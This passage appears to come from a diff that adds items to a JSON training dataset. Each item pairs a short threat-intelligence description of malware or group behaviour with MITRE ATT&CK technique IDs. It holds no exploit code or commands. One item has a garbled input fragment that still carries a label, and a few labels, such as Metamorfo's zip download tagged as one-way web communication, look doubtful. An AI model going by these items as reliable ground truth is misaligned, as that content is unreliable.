Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.", + "output": "- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.", + "output": "- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Metamorfo has downloaded a zip file for execution on the system.", + "output": "- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OnionDuke uses Twitter as a backup C2.", + "output": "- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"tDiscoverer\"\" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.\"", + "output": "- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has used multi-stage malware components that inject later stages into separate processes.", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Bazar loader is used to download and execute the Bazar backdoor.", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Conficker downloads an HTTP server to the infected machine.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.", + "output": "- T1105: Ingress Tool Transfer\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sidewinder has used LNK files to download remote files to the victim's network.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Squirrelwaffle has downloaded and executed additional encoded payloads.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Cobalt Strike's \"\"beacon\"\" payload is capable of running shell commands without \"\"cmd.exe\"\" and PowerShell commands without \"\"powershell.exe\"\"\"", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Goopy has the ability to enumerate the infected system's user name via \"\"GetUserNameW\"\".\"", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Milan can use the API `DnsQuery_A` for DNS resolution.", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels.", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WhisperGate has used the `ExitWindowsEx` API to flush file buffers to disk and stop running processes.", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "xCaon has leveraged native OS function calls to retrieve victim's network adapter's information using GetAdapterInfo() API.", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fox Kitten has brute forced RDP credentials.", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "China Chopper's server component can perform brute force password guessing against authentication portals.", + "output": "- T1110.001: Brute Force - Password Guessing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CrackMapExec can brute force passwords for a specified user on a single target system or across an entire network.", + "output": "- T1110.001: Brute Force - Password Guessing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HermeticWizard can use a list of hardcoded credentials in attempt to authenticate to SMB shares.", + "output": "- T1110.001: Brute Force - Password Guessing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and passwords.", + "output": "- T1110.001: Brute Force - Password Guessing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT3 has been known to brute force password hashes to be able to leverage plain text credentials.", + "output": "- T1110.002: Brute Force - Password Cracking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly 2.0 dropped and executed tools used for password cracking, including Hydra and CrackMapExec.", + "output": "- T1110.002: Brute Force - Password Cracking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec.", + "output": "- T1110.002: Brute Force - Password Cracking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Bad Rabbit\u2019s \"\"infpub.dat\"\" file uses NTLM login credentials to brute force Windows machines.\"", + "output": "- T1110.003: Brute Force - Password Spraying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.", + "output": "- T1110.003: Brute Force - Password Spraying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has used credential stuffing against victim's remote services to obtain valid accounts.", + "output": "- T1110.004: Brute Force - Credential Stuffing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrickBot uses brute-force attack against RDP with rdpscanDll module.", + "output": "- T1110.004: Brute Force - Credential Stuffing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CharmPower can remove persistence-related artifacts from the Registry.", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DCSrv has created Registry keys for persistence.", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Nerex creates a Registry subkey that registers a new service.", + "output": "- T1112: Modify Registry\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"PLAINTEE uses \"\"reg add\"\" to add a Registry Run key for persistence.\"", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rover has functionality to remove Registry Run key persistence as a cleanup procedure.", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "copy\"\".\"", + "output": "- T1114.001: Email Collection - Local Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet has been observed leveraging a module that scrapes email data from Outlook.", + "output": "- T1114.001: Email Collection - Local Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire has the ability to collect emails on a target system.", + "output": "- T1114.001: Email Collection - Local Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).", + "output": "- T1114.001: Email Collection - Local Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN4 has accessed and hijacked online email communications using stolen credentials.", + "output": "- T1114.002: Email Collection - Remote Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.", + "output": "- T1114.002: Email Collection - Remote Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has set auto-forward rules on victim's e-mail accounts.", + "output": "- T1114.003: Email Collection - Email Forwarding Rule" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image.", + "output": "- T1115: Clipboard Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Explosive has a function to use the OpenClipboard wrapper.", + "output": "- T1115: Clipboard Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A Helminth VBScript receives a batch script to execute a set of commands in a command prompt.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK 